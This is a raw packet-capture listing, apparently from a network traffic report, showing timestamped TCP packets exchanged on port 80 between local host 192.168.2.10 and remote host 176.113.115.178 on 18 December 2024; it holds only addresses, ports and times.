                                                        Dec 18, 2024 14:08:31.434086084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.434138060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.434669018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.434799910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.434858084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.435516119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.435627937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.435686111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.436472893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.436685085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.436757088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.437311888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.437325001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.437376022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.437985897 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.438110113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.438174963 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.438939095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.439069986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.439162016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.439781904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.439795017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.439843893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.440473080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.440593004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.440643072 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.441312075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.441437006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.441555977 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.442218065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.442230940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.442785025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.443048000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.443217993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.443866014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.443877935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.444668055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.444679976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.444734097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.444734097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.445563078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.445574999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.446445942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.446458101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.446537971 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.446537971 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.447227955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.447242022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.447336912 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.448012114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.448024988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.448080063 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.448935986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.448950052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.449237108 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.449676037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.449687958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.449739933 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.450628042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.450642109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.450691938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.451975107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.452147007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.452421904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.452434063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.452779055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.453094959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.453108072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.453742027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.453938961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.453954935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.454018116 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.454819918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.454850912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.454920053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.455575943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.455588102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.455681086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.456404924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.456417084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.457201004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.457226038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.457331896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.457827091 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.458079100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.458208084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.458864927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.458964109 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.459003925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.459830046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.459842920 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.460344076 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.460613012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.460844040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.461205006 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.461476088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.461739063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.462418079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.462429047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.462462902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.462462902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.463159084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.463171005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.463248014 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.496768951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.496799946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.497178078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.497190952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.497243881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.497284889 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.497714996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.497828007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.498585939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.498620033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.498686075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.498686075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.630466938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.630487919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.630589962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.630815029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.631011009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.631689072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.631724119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.631751060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.631808043 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.632544994 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.632668972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.632822037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.633372068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.633492947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.634208918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.634258986 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.634347916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.634454966 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.635185003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.635221004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.635857105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.635911942 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.635997057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.636097908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.636682034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.636928082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.637603998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.637619019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.637705088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.638447046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.638520002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.638659000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.639177084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.639282942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.640038013 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.640089035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.640168905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.640312910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.640868902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.640887022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.641024113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.641787052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.641804934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.642162085 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.642563105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.642577887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.642782927 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.643470049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.643486023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.643704891 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.644356012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.644373894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.644421101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.645178080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.645199060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.645262957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.646017075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.646034956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.646074057 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.646774054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.646841049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.646889925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.647545099 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.647561073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.647753000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.648650885 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.648665905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.649286985 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.649476051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.649492025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.649729013 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.650326014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.650341034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.650947094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.651089907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.651104927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.651171923 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.651870012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.651885033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.651972055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.652591944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.652606010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.652667046 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.653439999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.653455973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.653517008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.654181957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.654387951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.654468060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.655061960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.655160904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.655215025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.655930042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.656169891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.656217098 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.656837940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.656852007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.656902075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.657556057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.657735109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.658407927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.658513069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.658560038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.658560038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.659255981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.659379005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.659446955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.660044909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.660147905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.660901070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.660948038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.661032915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.661803007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.661819935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.661854029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.661967039 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.662558079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.662658930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.662839890 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.663477898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.663655996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.664263964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.664319992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.664320946 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.664429903 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.665172100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.665254116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.666086912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.666102886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.666147947 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.666258097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.666692019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.666806936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.666862965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.667593002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.667674065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.668427944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.668478012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.668504953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.668556929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.669260025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.669286966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.669339895 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.670104027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.670315027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.670882940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.670957088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.670984983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.671056986 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.689198971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.689274073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.689445019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.689541101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.689599037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.690589905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.690608025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.690646887 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.690718889 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.690949917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.740551949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.822763920 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.822817087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.822915077 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.823049068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.823250055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.823812008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.823857069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.824006081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.824187994 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.824600935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.824614048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.824656010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.825366020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.825583935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.826246977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.826296091 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.826957941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.827006102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.827006102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.827042103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.827800035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.827918053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.828634024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.828672886 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.828672886 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.828788996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.829189062 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.829509020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.829564095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.829617023 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.830388069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.830591917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.831347942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.831360102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.831396103 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.832020998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.832163095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.832201004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.832201004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.832844973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.832952976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.833676100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.833859921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.834484100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.834538937 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.834538937 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.834606886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.835402966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.835611105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.836153030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.836193085 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.836193085 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.836275101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.836983919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.837138891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.837188959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.837362051 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.837857962 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.838047981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.838757038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.838830948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.838871002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.838871002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.839497089 CET8049746176.113.115.178192.168.2.10
